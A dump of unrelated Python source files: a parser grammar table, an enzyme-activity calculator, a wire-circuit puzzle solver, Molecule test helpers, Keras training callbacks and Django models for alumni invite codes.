('ver_dim2 -> <empty>','ver_dim2',0,'p_ver_dim2','lexAndSyn.py',453),
('asignacion -> ID push_id EQUAL push_poper expresion create_asign SEMICOLON','asignacion',7,'p_asignacion','lexAndSyn.py',457),
('asignacion -> arreglo EQUAL push_poper exp create_asign SEMICOLON','asignacion',6,'p_asignacion','lexAndSyn.py',458),
('asignacion -> matrix EQUAL push_poper exp create_asign SEMICOLON','asignacion',6,'p_asignacion','lexAndSyn.py',459),
('asignacion -> ID push_id EQUAL push_poper llamadaAFuncion create_asign SEMICOLON','asignacion',7,'p_asignacion','lexAndSyn.py',460),
('asignacion -> ID push_id EQUAL push_poper determinante SEMICOLON','asignacion',6,'p_asignacion','lexAndSyn.py',461),
('determinante -> ID push_id DETERMINANT','determinante',3,'p_determinante','lexAndSyn.py',465),
('push_id_dimensionada -> <empty>','push_id_dimensionada',0,'p_push_id_dimensionada','lexAndSyn.py',470),
('create_asign_dim -> <empty>','create_asign_dim',0,'p_create_asign_dim','lexAndSyn.py',473),
('ver_dim1 -> <empty>','ver_dim1',0,'p_ver_dim1','lexAndSyn.py',477),
('create_asign -> <empty>','create_asign',0,'p_create_asign','lexAndSyn.py',481),
('comparacion -> ID push_id DOUBLEEQUAL push_poper expresion SEMICOLON','comparacion',6,'p_comparacion','lexAndSyn.py',485),
('condicion -> IF LPAREN expresion RPAREN cond bloque condFinal','condicion',7,'p_condicion','lexAndSyn.py',489),
('condicion -> IF LPAREN expresion RPAREN cond bloque ELSE condElse bloque condFinal','condicion',10,'p_condicion','lexAndSyn.py',490),
('cond -> <empty>','cond',0,'p_quad_cond','lexAndSyn.py',494),
('condElse -> <empty>','condElse',0,'p_quad_condElse','lexAndSyn.py',498),
('condFinal -> <empty>','condFinal',0,'p_quad_condFinal','lexAndSyn.py',502),
('escritura -> PRINT push_poper LPAREN escrituraAux RPAREN quad_print SEMICOLON','escritura',7,'p_escritura','lexAndSyn.py',506),
('escritura -> PRINT push_poper LPAREN llamadaAFuncion RPAREN quad_print SEMICOLON','escritura',7,'p_escritura','lexAndSyn.py',507),
('lectura -> INPUT push_poper LPAREN ID push_id RPAREN quad_print SEMICOLON','lectura',8,'p_lectura','lexAndSyn.py',511),
('quad_print -> <empty>','quad_print',0,'p_quad_print','lexAndSyn.py',515),
('escrituraAux -> expresion','escrituraAux',1,'p_escrituraAux','lexAndSyn.py',519),
('escrituraAux -> CTE_STRING push_cte','escrituraAux',2,'p_escrituraAux','lexAndSyn.py',520),
('escrituraAux -> expresion COMA escrituraAux','escrituraAux',3,'p_escrituraAux','lexAndSyn.py',521),
('escrituraAux -> CTE_STRING push_cte COMA escrituraAux','escrituraAux',4,'p_escrituraAux','lexAndSyn.py',522),
('escrituraAux -> llamadaAFuncion','escrituraAux',1,'p_escrituraAux','lexAndSyn.py',523),
('expresion -> exp','expresion',1,'p_expresion','lexAndSyn.py',527),
('expresion -> exp comp exp quad_comp','expresion',4,'p_expresion','lexAndSyn.py',528),
('comp -> LOWERTHAN push_poper','comp',2,'p_comp','lexAndSyn.py',532),
('comp -> MORETHAN push_poper','comp',2,'p_comp','lexAndSyn.py',533),
('comp -> DIFFERENT push_poper','comp',2,'p_comp','lexAndSyn.py',534),
('comp -> DOUBLEEQUAL push_poper','comp',2,'p_comp','lexAndSyn.py',535),
('comp -> LOWEREQUAL push_poper','comp',2,'p_comp','lexAndSyn.py',536),
('comp -> MOREEQUAL push_poper','comp',2,'p_comp','lexAndSyn.py',537),
('quad_comp -> <empty>','quad_comp',0,'p_quad_comp','lexAndSyn.py',541),
('exp -> termino quad_term','exp',2,'p_exp','lexAndSyn.py',545),
('exp -> termino quad_term exp1','exp',3,'p_exp','lexAndSyn.py',546),
('exp1 -> PLUS push_poper exp','exp1',3,'p_exp1','lexAndSyn.py',550),
('exp1 -> MINUS push_poper exp','exp1',3,'p_exp1','lexAndSyn.py',551),
('quad_term -> <empty>','quad_term',0,'p_quad_term','lexAndSyn.py',555),
('quad_fact -> <empty>','quad_fact',0,'p_quad_fact','lexAndSyn.py',559),
('termino -> factor quad_fact','termino',2,'p_termino','lexAndSyn.py',563),
('termino -> factor quad_fact termino1','termino',3,'p_termino','lexAndSyn.py',564),
('termino1 -> TIMES push_poper termino','termino1',3,'p_termino1','lexAndSyn.py',568),
('termino1 -> DIVIDE push_poper termino','termino1',3,'p_termino1','lexAndSyn.py',569),
('factor -> LPAREN expresion RPAREN','factor',3,'p_factor','lexAndSyn.py',573),
('factor -> factorAux','factor',1,'p_factor','lexAndSyn.py',574),
('factorAux -> PLUS push_poper var_cte','factorAux',3,'p_factorAux','lexAndSyn.py',578),
('factorAux -> MINUS push_poper var_cte','factorAux',3,'p_factorAux','lexAndSyn.py',579),
('factorAux -> var_cte','factorAux',1,'p_factorAux','lexAndSyn.py',580),
('push_id -> <empty>','push_id',0,'p_push_id','lexAndSyn.py',584),
('push_cte -> <empty>','push_cte',0,'p_push_cte','lexAndSyn.py',588),
('push_poper -> <empty>','push_poper',0,'p_push_poper','lexAndSyn.py',598),
('var_cte -> ID push_id','var_cte',2,'p_var_cte','lexAndSyn.py',602),
('var_cte -> CTE_I push_cte','var_cte',2,'p_var_cte','lexAndSyn.py',603),
('var_cte -> CTE_F push_cte','var_cte',2,'p_var_cte','lexAndSyn.py',604),
('var_cte -> CTE_STRING push_cte','var_cte',2,'p_var_cte','lexAndSyn.py',605),
('var_cte -> arreglo','var_cte',1,'p_var_cte','lexAndSyn.py',606),
('var_cte -> matrix','var_cte',1,'p_var_cte','lexAndSyn.py',607),
]
|
7,984 | 19949b07c866d66b3ef00b6a386bf89f03e06294 | ############################## Import Modules ##################################
import pandas as pd
import numpy as np
import re
from scipy import stats
import matplotlib.pyplot as plt
############################## Define Functions ################################
# generate list containing data of standard curve
def process_std(standard_input_file):
    """Read the standard-curve file and return its lines as a list.

    Each returned element is one raw line with the trailing newline removed.
    Exits the program with status 1 if the file cannot be opened.
    """
    try:
        with open(standard_input_file, 'r') as in_handle:
            return [raw_line.strip('\n') for raw_line in in_handle]
    except IOError:
        print("Could not open " + standard_input_file + " for reading.")
        quit(1)
# generate info_dict containing information about the samples
def process_info(info_file):
    """Parse the sample-info file into a dict.

    Each line is space-separated:
        <sample_name> <well1,well2,...> <enzyme_conc> <dilution>

    Returns:
        dict mapping sample name -> {'wells': [str, ...],
                                     'conc': float, 'dil': float}
    Exits with status 1 if the file cannot be opened.
    """
    try:
        info_dict = {}
        with open(info_file, 'r') as in_handle:
            for line in in_handle:
                line = line.strip()
                items = re.split(' ', line)
                well_lst = re.split(',', items[1])
                info_dict[items[0]] = {'wells': well_lst,
                                       'conc': float(items[2]),
                                       'dil': float(items[3])}
    except IOError:
        # Bug fix: the original referenced the undefined global ``args.info``
        # here, which raised NameError instead of printing this message.
        print("Could not open " + info_file + " for reading.")
        quit(1)
    return info_dict
# calculate substrate concentration from absorption values
def abs_to_subconc(meas_df, info_dict, m, c):
    """Convert raw absorption readings into substrate concentrations in place.

    meas_df: numpy array of the measurement sheet; rows start with a well
             label (str) followed by numeric absorption values.
             (assumes this layout — TODO confirm against the CSV loader)
    info_dict: sample info as produced by process_info().
    m, c: slope and intercept of the standard curve (A = m*S + c), so the
          inverse S = (A - c) / m maps absorbance back to concentration.
    Returns the mutated meas_df.
    """
    # find data series belonging to a sample
    for sample in info_dict.keys():
        for well in info_dict[sample]['wells']:
            # Row index of the row whose first cell equals the well label.
            i = np.where(meas_df == well)
            # convert absorption values to substrate concentration
            for row in meas_df[i[0]]:
                count = 1  # column 0 holds the well label, data starts at 1
                for el in row:
                    if type(el) != str:
                        conc = (el - c)/m
                        meas_df[i[0], count] = conc
                        count += 1
    return meas_df
# process blank to get slope
def process_blank(blank_file, std_m, std_c):
    """Compute the slope of the blank (no-enzyme) time series.

    Reads the blank measurement CSV, converts absorbances to substrate
    concentration via the standard curve (std_m, std_c), averages replicate
    wells, and returns the slope of a linear regression of concentration
    against time (used later to correct sample slopes).
    """
    blank_df = pd.read_csv(blank_file)
    blank_df = blank_df.to_numpy()
    # define x values: locate the time row, normally labelled 'Time [s]'
    i = np.where(blank_df == 'Time [s]')
    # fall-back for case that time per well is measured in milliseconds
    if len(i[0]) == 0:
        b_arr = []
        i = np.where(blank_df == 'Time [ms]')
        # convert ms to s
        for row in blank_df[i[0]]:
            count = 1
            arr = []
            for el in row:
                if type(el) != str:
                    sec = el*0.001
                    arr.append(sec)
                    count += 1
            b_arr.append(arr)
        blank_x = np.vstack(b_arr)
        # make average for time across the per-well time rows
        av_lst = []
        for row in np.transpose(blank_x):
            av = sum(row) / len(row)
            av_lst.append(av)
        blank_x = np.transpose(np.array(av_lst))
    else:
        blank_x = np.array(blank_df[i[0]][0, 1:])
    # define y values: rows whose first cell looks like a well label (A1..Z99)
    arr = []
    for row in blank_df:
        if re.search(r'^[A-Z]\d\d?$', row[0]):
            arr.append(row[1:])
    if len(arr) < 2:
        blank_arr = np.array(arr)
    else:
        blank_arr = np.vstack(arr)
    # Convert every absorbance to concentration with the standard curve.
    count_r = 0
    for row in blank_arr:
        count_c = 0
        for el in row:
            if type(el) != str:
                conc = (el - std_c)/std_m
                blank_arr[count_r, count_c] = conc
                count_c += 1
        count_r += 1
    # Average the replicate wells column-wise.
    av_lst = []
    for row in np.transpose(blank_arr):
        av = sum(row) / len(row)
        av_lst.append(av)
    if len(av_lst) < 2:
        blank_y = np.transpose(np.array(av_lst))
    else:
        blank_y = np.transpose(np.vstack(av_lst))
    # Slope of concentration vs. time is the blank's background rate.
    b_m, b_c, b_r, b_p, stderr = stats.linregress(blank_x.astype(float),
                                                  blank_y.astype(float))
    return b_m
# calculate average activity and standard deviation of each sample
def act_calc(meas_df, info_dict, b_m, std_m, std_c):
    """Interactively compute specific activity per sample.

    Prompts the user for the number of time intervals to regress over and
    the well volume, fits a line per well, corrects each slope with the
    blank slope ``b_m``, converts it to specific activity (U/mg), saves a
    plot to 'activity_plot.png', and returns a summary dict
    {sample: {'av_sact': float, 'std': float}, 'interval': int}.
    """
    act_dict = {}
    # m_lin defines most linear part from first point
    while True:
        print("How many time intervals you want to take for the "
              + "analysis? (most linear part from first to x)")
        m_lin = input()
        if m_lin.isnumeric() == True and int(m_lin) > 1:
            break
    m_lin = int(m_lin)
    # define volume per well
    while True:
        print("What is the volume per well? (in µL)")
        well_v = input()
        print("\n")
        if well_v.isnumeric() == True:
            break
    # define x values
    time = np.where(meas_df == 'Time [s]')
    # fall-back for case that time per well is measured (in milliseconds)
    if len(time[0]) == 0:
        m_arr = []
        time = np.where(meas_df == 'Time [ms]')
        # convert ms to s
        for row in meas_df[time[0]]:
            arr = []
            count = 1
            for el in row:
                if type(el) != str:
                    sec = el*0.001
                    arr.append(sec)
                    count += 1
            m_arr.append(arr)
        x = np.vstack(m_arr)
        # make average for time values across wells
        av_lst = []
        for row in np.transpose(x):
            av = sum(row) / len(row)
            av_lst.append(av)
        x = np.transpose(np.array(av_lst[0:m_lin]))
    else:
        x = meas_df[time[0]]
        x = np.array(x[0, 1:m_lin + 1])
    # process sample data
    for sample in info_dict.keys():
        e_conc = info_dict[sample]['conc']
        e_dil = info_dict[sample]['dil']
        # mg enzyme per well, corrected for the dilution factor
        e_conc = float(e_conc)/ (float(e_dil)*1000)
        for well in info_dict[sample]['wells']:
            i = np.where(meas_df == well)
            y = meas_df[i[0]]
            y = np.array(y[0, 1:m_lin + 1])
            m, c, r, p, stderr = stats.linregress(x.astype(float),
                                                  y.astype(float))
            print(sample + ' >R²' + str(r))
            # plot substrate decrease with the fitted line
            plt.figure(1, figsize=[10,5], frameon=False)
            plt.plot(x, y, 'x', markersize=2, label=sample)
            plt.plot(x, m*x + c, 'r', linestyle='--', color='gray')
            plt.savefig('activity_plot.png')
            # calculate specific activity: blank-corrected slope scaled to
            # U/mg (per-minute, per-µL-to-L, per-mg-enzyme conversion)
            m = abs(m - b_m)
            sact = (m*60*int(well_v)) / (10*1000000*float(e_conc))
            act_dict.setdefault(sample, [])
            act_dict[sample].append(sact)
    # calculate average specific activity per sample
    summery_dict = {}
    summery_dict['interval'] = m_lin
    for sample in act_dict.keys():
        av_sact = sum(act_dict[sample]) / len(act_dict[sample])
        print("average specific activity of " + sample + " = "
              + str(av_sact) + " U/mg")
        # calculate standard deviation per sample
        std = np.std(act_dict[sample])
        print("standard deviation for " + sample + ": +/-" + str(std))
        # generate summery_dict for output file
        summery_dict[sample] = {'av_sact': av_sact, 'std': std}
    return summery_dict
# process summery_dict to generate output file
def gen_output(summery_dict, name):
    """Write the activity summary to ``<name>_activity.out``.

    summery_dict: as returned by act_calc() — an 'interval' key plus one
                  {'av_sact', 'std'} dict per sample.
    name: output file prefix (may include a directory).
    Exits with status 1 if the file cannot be opened.
    """
    out_path = name + '_activity.out'
    try:
        with open(out_path, 'w') as out_handle:
            out_handle.write('time interval from 1. to '
                             + str(summery_dict['interval'])
                             + '. was used for calculations.\n')
            for sample in summery_dict.keys():
                if sample == 'interval':
                    continue
                out_handle.write(str(sample) + ': s = '
                                 + str(summery_dict[sample]['av_sact'])
                                 + ' +/- '
                                 + str(summery_dict[sample]['std']) + '\n')
    except IOError:
        # Bug fix: report the actual output file name instead of the
        # hard-coded 'activity.out'.
        print("Could not open " + out_path + " for writing.")
        quit(1)
|
7,985 | a5eb1f559972519dbe0f3702e03af77e61fbfb4e | #!/usr/bin/env python3
import sys
import re
from collections import namedtuple
def isnum(name):
    """Return True if *name* is a decimal integer literal, optionally negative.

    Bug fix: the original returned True for ANY string starting with '-'
    (e.g. '-abc'), which later made ``int(name)`` raise ValueError in
    WireValues.__getitem__.  Now the part after the sign must be digits.
    """
    if name.startswith('-'):
        return name[1:].isdigit()
    return name.isdigit()
class WireValues:
    """Mapping from wire names to 16-bit signal values.

    Numeric strings are treated as immediate integer literals: they are
    always "contained" and index access returns their int value.
    """

    def __init__(self):
        self.wires = {}

    def __getitem__(self, name):
        if isnum(name):
            return int(name)
        return self.wires[name]

    def __setitem__(self, name, value):
        self.wires[name] = value

    def __contains__(self, name):
        if isnum(name):
            return True
        return name in self.wires
Command = namedtuple('Command', 'pattern function')
WireLink = namedtuple('WireLink', 'command inputs output')

COMMANDS = []


def make_command(expr):
    """Decorator factory registering a gate implementation for *expr*.

    Each '#' in *expr* is a placeholder matching a wire name or an
    integer literal; the compiled pattern and the function are stored
    together as a Command in the global COMMANDS registry.
    """
    compiled = re.compile('^' + expr.replace('#', '([0-9a-z]+)') + '$')

    def register(function):
        cmd = Command(compiled, function)
        COMMANDS.append(cmd)
        return cmd

    return register


@make_command('# -> #')
def assignment(wires, src, dest):
    """Plain signal assignment."""
    wires[dest] = wires[src]


@make_command('# AND # -> #')
def anding(wires, lhs, rhs, dest):
    """Bitwise AND gate."""
    wires[dest] = wires[lhs] & wires[rhs]


@make_command('# OR # -> #')
def oring(wires, lhs, rhs, dest):
    """Bitwise OR gate."""
    wires[dest] = wires[lhs] | wires[rhs]


@make_command('# LSHIFT # -> #')
def lshift(wires, lhs, rhs, dest):
    """Left-shift gate."""
    wires[dest] = wires[lhs] << wires[rhs]


@make_command('# RSHIFT # -> #')
def rshift(wires, lhs, rhs, dest):
    """Right-shift gate."""
    wires[dest] = wires[lhs] >> wires[rhs]


@make_command('NOT # -> #')
def notting(wires, src, dest):
    """Bitwise NOT, truncated to 16 bits."""
    wires[dest] = ((1 << 16) - 1) & ~wires[src]
def create_link(line):
    """Parse one circuit instruction line into a WireLink.

    Tries each registered command pattern in turn; the matched groups are
    split into input operands and the single output wire name.
    Raises ValueError for a line no command pattern matches.
    """
    for cmd in COMMANDS:
        m = re.match(cmd.pattern, line)
        if m:
            gps = m.groups()
            # All groups but the last are inputs; the last is the output wire.
            return WireLink(cmd, gps[:-1], gps[-1])
    raise ValueError(repr(line))
def process_links(links):
    """Evaluate the circuit and return the resulting WireValues.

    Repeatedly sweeps the remaining links, executing any whose inputs are
    all known, until every link has fired.
    NOTE(review): loops forever if the circuit has an unsatisfiable link
    (e.g. a cycle) — assumed not to occur in valid input.
    """
    wires = WireValues()
    while links:
        remaining = []
        for link in links:
            if all(i in wires for i in link.inputs):
                link.command.function(wires, *link.inputs, link.output)
            else:
                remaining.append(link)
        links = remaining
    return wires
def main():
    """Solve both puzzle parts from instructions read on stdin.

    Part 1: evaluate the circuit and report wire 'a'.
    Part 2: override wire 'b' with part 1's answer, re-evaluate, report 'a'.
    """
    lines = sys.stdin.read().strip().split('\n')
    links = [create_link(line) for line in lines]
    wires = process_links(links)
    answer = wires['a']
    print("Part 1 wire a:", answer)
    # Replace the instruction feeding wire 'b' with a constant assignment
    # of part 1's answer, then rerun the whole circuit.
    index = next(i for (i,link) in enumerate(links) if link.output=='b')
    links[index] = WireLink(assignment, [str(answer)], 'b')
    wires = process_links(links)
    answer = wires['a']
    print("Part 2 wire a:", answer)
if __name__ == '__main__':
main()
|
7,986 | 5bdc08b66916959d462314b8a6e5794e5fa12b55 | import os
import pathlib
import enum
import warnings
import colorama
import requests
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
import invoke
class MoleculeDriver(enum.Enum):
    """Virtualization/container drivers supported for Molecule test runs."""
    docker = 1
    lxd = 2
    vagrant = 3
class TestPlatform(enum.Enum):
    """Guest platforms the Molecule scenarios can be exercised on."""
    linux = 1
    ubuntu = 2
    centos = 3
def print_header(header_text):
    """Print *header_text* centered in a bright cyan 80-column '=' banner."""
    banner = f" {header_text} ".center(80, "=")
    print(colorama.Fore.CYAN + colorama.Style.BRIGHT + banner + colorama.Style.RESET_ALL)
def print_sub_header(sub_header_text):
    """Print *sub_header_text* as a left-aligned cyan '-' sub-banner."""
    body = "--" + f" {sub_header_text} ".ljust(78, "-")
    print(colorama.Fore.CYAN + colorama.Style.BRIGHT + body + colorama.Style.RESET_ALL)
def print_success_message(success_message_text):
    """Print a green 80-column '=' banner announcing success."""
    banner = f" {success_message_text}: Success ".center(80, "=")
    print(colorama.Fore.GREEN + colorama.Style.BRIGHT + banner + colorama.Style.RESET_ALL)
def run_command(context, *args, **kwargs):
    """Run a shell command via invoke, printing a red banner on failure.

    The invoke Failure is re-raised after printing so callers still see it.
    args[0] is assumed to be the command string being executed.
    """
    try:
        return context.run(*args, **kwargs)
    except invoke.exceptions.Failure:
        print(
            colorama.Fore.RED + colorama.Style.BRIGHT +
            "Failure: error executing '" + args[0] + "' command" +
            colorama.Style.RESET_ALL
        )
        raise
def get_base_config_path(driver_code, platform_code):
    """Return the absolute path of the Molecule base config for a
    driver/platform combination, resolved relative to this file."""
    config_name = f"molecule/molecule_base_{driver_code.name}_{platform_code.name}.yml"
    return str(pathlib.Path(__file__).resolve().parent / config_name)
def get_molecule_scenarios(context):
    """Return the sorted names of scenario directories under ./molecule.

    A scenario is any subdirectory that contains a molecule.yml file.
    The *context* argument is unused but kept for invoke-task signature
    compatibility.
    """
    scenario_root = pathlib.Path.cwd() / "molecule"
    return sorted(
        child.name
        for child in scenario_root.iterdir()
        if child.is_dir() and (child / "molecule.yml").exists()
    )
def run_molecule(context, command, scenario, driver, platform="linux", env=None):
    """Run a molecule subcommand with the right base config and environment.

    command: molecule subcommand (e.g. 'test', 'converge').
    scenario: scenario name, or None for the default.
    driver/platform: case-insensitive MoleculeDriver / TestPlatform names.
    env: extra environment variables; fix — the default is now None instead
         of a shared mutable dict (it was copied, but a mutable default is
         an anti-pattern and a trap for future edits).
    """
    driver_code = MoleculeDriver[driver.lower()]
    platform_code = TestPlatform[platform.lower()]
    molecule_env = {} if env is None else env.copy()
    # lxd/vagrant guests need an explicit login user for molecule.
    if driver_code == MoleculeDriver.lxd:
        molecule_env.update({"MOLECULE_USER_NAME": "root"})
    elif driver_code == MoleculeDriver.vagrant:
        molecule_env.update({"MOLECULE_USER_NAME": "vagrant"})
    molecule_command = (
        f"molecule --base-config {get_base_config_path(driver_code, platform_code)} {command}"
    )
    if scenario is not None:
        molecule_command += f" -s {scenario}"
    run_command(context, molecule_command, env=molecule_env, echo=True)
def get_parameter_value(host, ansible_var_name, param_value, default_value):
    """Resolve a test parameter with precedence:
    explicit param_value > ansible variable > default_value.

    The ansible variable is only consulted when the testinfra backend has
    actually run ansible.
    """
    if host.backend.HAS_RUN_ANSIBLE:
        ansible_value = host.ansible.get_variables().get(ansible_var_name, None)
    else:
        ansible_value = None
    chosen = param_value if param_value is not None else ansible_value
    return default_value if chosen is None else chosen
def get_github_release_info(release_url):
    """Fetch release metadata from the GitHub API and return the parsed JSON.

    release_url: the path after /repos/, e.g. 'owner/repo/releases/latest'.
    Uses the AO_GITHUB_OAUTH_TOKEN environment variable, when set, to
    authenticate and avoid the low unauthenticated rate limit.
    """
    if "AO_GITHUB_OAUTH_TOKEN" in os.environ:
        headers = {"Authorization": "token " + os.environ["AO_GITHUB_OAUTH_TOKEN"]}
    else:
        headers = None
    return requests.get(
        "https://api.github.com/repos/" + release_url, headers=headers
    ).json()
|
7,987 | f8635c815b375dc77e971d4ea0f86547215ab2f9 | __author__ = 'GazouillisTeam'
import numpy as np
import os
import sys
import time
from keras.callbacks import Callback
def save_architecture(model, path_out):
    """Save a model's textual summary and JSON config to *path_out*.

    Writes 'architecture.txt' (the output of model.summary(), captured by
    temporarily redirecting stdout) and 'config.json' (model.to_json()).

    Bug fixes vs. the original:
    - used the Python 2 ``file()`` builtin, a NameError on Python 3;
    - never restored sys.stdout if model.summary() raised;
    - leaked the config.json file handle (open(...).write(...)).
    """
    arch_path = os.path.join(path_out, "architecture.txt")
    orig_stdout = sys.stdout
    try:
        with open(arch_path, 'w') as f:
            # model.summary() prints; capture it into the file.
            sys.stdout = f
            model.summary()
    finally:
        # Always restore the print output direction.
        sys.stdout = orig_stdout
    with open(os.path.join(path_out, "config.json"), 'w') as f:
        f.write(model.to_json())
def create_log(path, settings, filename="log.txt"):
    """Create a fresh training log containing the settings and a start stamp.

    Overwrites any existing file of the same name under *path*.
    """
    start_stamp = "\n####\nStarted on %s at %s\n" % (time.strftime("%d/%m/%Y"),
                                                     time.strftime("%H:%M:%S"))
    with open(os.path.join(path, filename), "w") as log_file:
        log_file.writelines(str(settings))
        log_file.writelines(start_stamp)
def write_log(path, string, filename="log.txt"):
    """
    Add a line at the end of a textfile.
    :param path: textfile location
    :param string: line to add

    Improvement: opens in append mode instead of the original
    read-all/append/rewrite-all cycle, which was O(file size) per call
    and not crash-safe.  As a side effect the log file is created if it
    does not exist yet (the original raised IOError in that case; in
    practice create_log() is always called first).
    """
    with open(os.path.join(path, filename), "a") as f:
        f.write(string)
class ModelSaver(Callback):
    """
    Keras callback implementing the weight-saving policy used during training.

    Weights are snapshotted right after initialization
    ('after_initialization'), after every epoch that improves the monitored
    metric ('best_model'), and otherwise at the end of each epoch
    ('last_epoch').  A one-line epoch summary is appended to the log file
    via write_log().
    """
    def __init__(self, path, path_weights, monitor, verbose=1, h5py=False):
        # Bug fix: the original called ``super(Callback, self).__init__()``,
        # which invokes Callback's *parent* and silently skips
        # Callback.__init__ itself.
        super(ModelSaver, self).__init__()
        self.verbose = verbose
        self.path = path                    # directory holding the log file
        self.path_weights = path_weights    # directory for weight snapshots
        self.monitor = monitor              # key in ``logs`` to minimize
        # np.Inf was removed in NumPy 2.0; np.inf is the same float value.
        self.best = np.inf
        self.h5py = h5py                    # whether h5py saving is available

    def save_weights(self, path):
        """Persist the current model weights under *path* (.npy or .h5py)."""
        if not self.h5py:  # H5PY not available: save weights using np.save
            w = self.model.get_weights()
            np.save(path + ".npy", w)
        else:
            self.model.save_weights(path + ".h5py", overwrite=True)

    def on_epoch_begin(self, epoch, logs={}):
        self.epoch_start = time.time()
        # Snapshot the randomly-initialized weights before any training.
        if epoch == 0:
            save_path = os.path.join(self.path_weights, "after_initialization")
            self.save_weights(save_path)

    def on_epoch_end(self, epoch, logs={}):
        self.epoch_end = time.time()
        # Value of the monitored quantity for this epoch.
        monitor = logs.get(self.monitor)
        # condition is True when the monitored metric improved (decreased).
        condition = monitor < self.best
        if condition:
            # Save weights as "best_model"
            self.best = monitor
            save_path = os.path.join(self.path_weights, "best_model")
            self.save_weights(save_path)
        else:
            # Save weights as "last_epoch"
            save_path = os.path.join(self.path_weights, "last_epoch")
            self.save_weights(save_path)
        # Log file management: append one summary line per epoch.
        if self.verbose > 0:
            log_string = "####\nEpoch %d took %d s: " % (epoch, int(self.epoch_end - self.epoch_start))
            for k in logs.keys():
                log_string += "%s : %.4f # " % (k, logs.get(k))
            if condition:
                log_string += "\tBEST"
            write_log(self.path, log_string)
def trainargs2strings(path, model, dataset, index_train, index_valid, D, batch_size,
                      nsamples_per_epoch, nepoch, patience, lr):
    """Format the training configuration as one human-readable string.

    The *model* argument is accepted for signature compatibility but is
    not included in the output.
    """
    parts = [
        "Path : %s" % path,
        "\nDataset shape :" + str(dataset.shape),
        "\nNtrain : %d" % len(index_train),
        "\nNvalid : %d" % len(index_valid),
        "\nDim : %d" % D,
        "\nBatch size : %d" % batch_size,
        "\nNb samples per epoch : %d" % nsamples_per_epoch,
        "\nNb epochs : %d" % nepoch,
        "\nPatience : %d" % patience,
        "\nLR : %.5f" % lr,
    ]
    return "".join(parts)
7,988 | 192e789129a51aa646a925fc4f8c3f8f4e14d478 | import datetime
from random import SystemRandom
import re
import string
import time
from django.db import models
from django.utils import timezone
from app.translit import translit
# Each model extends models.Model
class alumni(models.Model):
    """A school alumnus (graduate) record.

    Python 2 Django model — uses __unicode__ for string representation.
    """
    alumnus_id = models.AutoField(primary_key=True)
    full_name = models.CharField(max_length=150)
    year = models.IntegerField()  # graduation year
    letter = models.CharField(max_length=2)  # class letter, e.g. 'A'
    add_time = models.DateTimeField(auto_now_add=True)
    added_by = models.CharField(max_length=50)  # who entered this record

    class Meta:
        verbose_name = 'Alumnus'
        verbose_name_plural = 'Alumni'

    def __unicode__(self):
        # e.g. u"Full Name, 2005A"
        return self.full_name + ", " + unicode(self.year) + self.letter
class Application(models.Model):
    """An external application that temporary invite codes can be issued for."""
    slug = models.SlugField()
    name = models.CharField(max_length=200)
    url = models.URLField()
    disabled = models.BooleanField(default=False)
    # Default lifetime (seconds) of temporary codes for this application.
    valid_for = models.PositiveIntegerField()

    def __unicode__(self):
        return self.slug
class invites(models.Model):
    """An invite code issued to an alumnus.

    Codes look like '57-<year><letter>-<name-part>-<random digits>' and may
    optionally be temporary, application-scoped codes derived from a
    permanent one (see temporary_for()).
    """
    PREFIX = '57'      # fixed school prefix for every generated code
    STRENGTH = 16      # number of random digits at the end of a code
    STATUS_OK = 1
    STATUS_DISABLED = 2
    STATUS_BANNED = 3
    STATUSES = (
        (1, 'OK'),
        (2, 'DISABLED'),
        (3, 'BANNED'),
    )
    code = models.CharField(max_length=255)
    alumni = models.ForeignKey(alumni)
    # Set only for temporary, application-scoped codes.
    application = models.ForeignKey(Application, null=True, blank=True)
    add_time = models.DateTimeField(auto_now_add=True)
    status = models.SmallIntegerField(choices=STATUSES, default=STATUS_OK)
    disabled_at = models.DateTimeField(null=True, blank=True)
    expires_at = models.DateTimeField(null=True, blank=True)
    used_at = models.DateTimeField(null=True, blank=True)

    @classmethod
    def temporary_for(cls, invite, application, valid_for, session):
        """Return (reusing if possible) a temporary code for *application*.

        If a temporary code derived from *invite* for this application
        already exists, its expiry is extended and it is returned;
        otherwise a new code is created and linked to the original.
        valid_for: lifetime in seconds, or None to use the application's
        default.
        """
        try:
            new_code = invite_links.objects.get(
                code_from_id=invite.id,
                is_temporary_for=True,
                code_to__application_id=application.id
            ).code_to
            if valid_for is not None:
                new_code.ensure_expires_after(valid_for)
            return new_code
        except invite_links.DoesNotExist:
            pass
        if valid_for is None:
            valid_for = application.valid_for
        expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for)
        new_code = invites(application=application, alumni_id=invite.alumni_id, expires_at=expires_at, used_at=datetime.datetime.now())
        # Tag the generated code with the application slug.
        new_code.code += '-' + application.slug
        new_code.save()
        link = invite_links(code_from=invite, code_to=new_code, session=session, is_temporary_for=True)
        link.save()
        return new_code

    def __init__(self, *args, **kwargs):
        """Auto-generate the code string when a new invite is created."""
        super(invites, self).__init__(*args, **kwargs)
        if not self.code and self.alumni_id:
            code = [self.PREFIX, str(self.alumni.year) + translit(self.alumni.letter).lower()]
            # Drop a leading parenthesized part (e.g. maiden name) if any.
            full_name = re.sub(r'\([^)]*\)\s+', '', self.alumni.full_name)
            surname, name = full_name.split(' ', 1)
            code.append(translit(surname[:3]).lower() + translit(name[0]).lower())
            # Cryptographically secure random digit suffix.
            csprng = SystemRandom()
            code.append(''.join(csprng.choice(string.digits) for _ in range(self.STRENGTH)))
            self.code = "-".join(code)

    class Meta:
        verbose_name = 'Invite'
        verbose_name_plural = 'Invites'

    def __unicode__(self):
        return unicode(self.code) + " (" + unicode(self.alumni) + ")"

    def safe_form(self):
        """Return the code with most of the random suffix masked with 'x'."""
        code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH-4) + self.code[-4:]
        return unicode(code)

    def is_enabled(self):
        return self.status == self.STATUS_OK

    def is_temporary(self):
        # Temporary codes are exactly those bound to an application.
        return self.application_id is not None

    def disable(self, at=None):
        """Mark the code disabled, never with a timestamp in the future."""
        if at is None:
            at = timezone.now()
        self.status = self.STATUS_DISABLED
        if at > timezone.now():
            at = timezone.now()
        # Keep the earliest disable time on record.
        if self.disabled_at is None or self.disabled_at > at:
            self.disabled_at = at

    def merge_to(self, other_code, session):
        """Record that this code was merged into *other_code*."""
        link = invite_links(code_from=self, code_to=other_code, is_merged_to=True, session=session)
        link.save()

    def verbose_status(self):
        """Return the status as a lowercase string, or None if unknown."""
        if self.status == self.STATUS_OK:
            return 'ok'
        if self.status == self.STATUS_DISABLED:
            return 'disabled'
        if self.status == self.STATUS_BANNED:
            return 'banned'
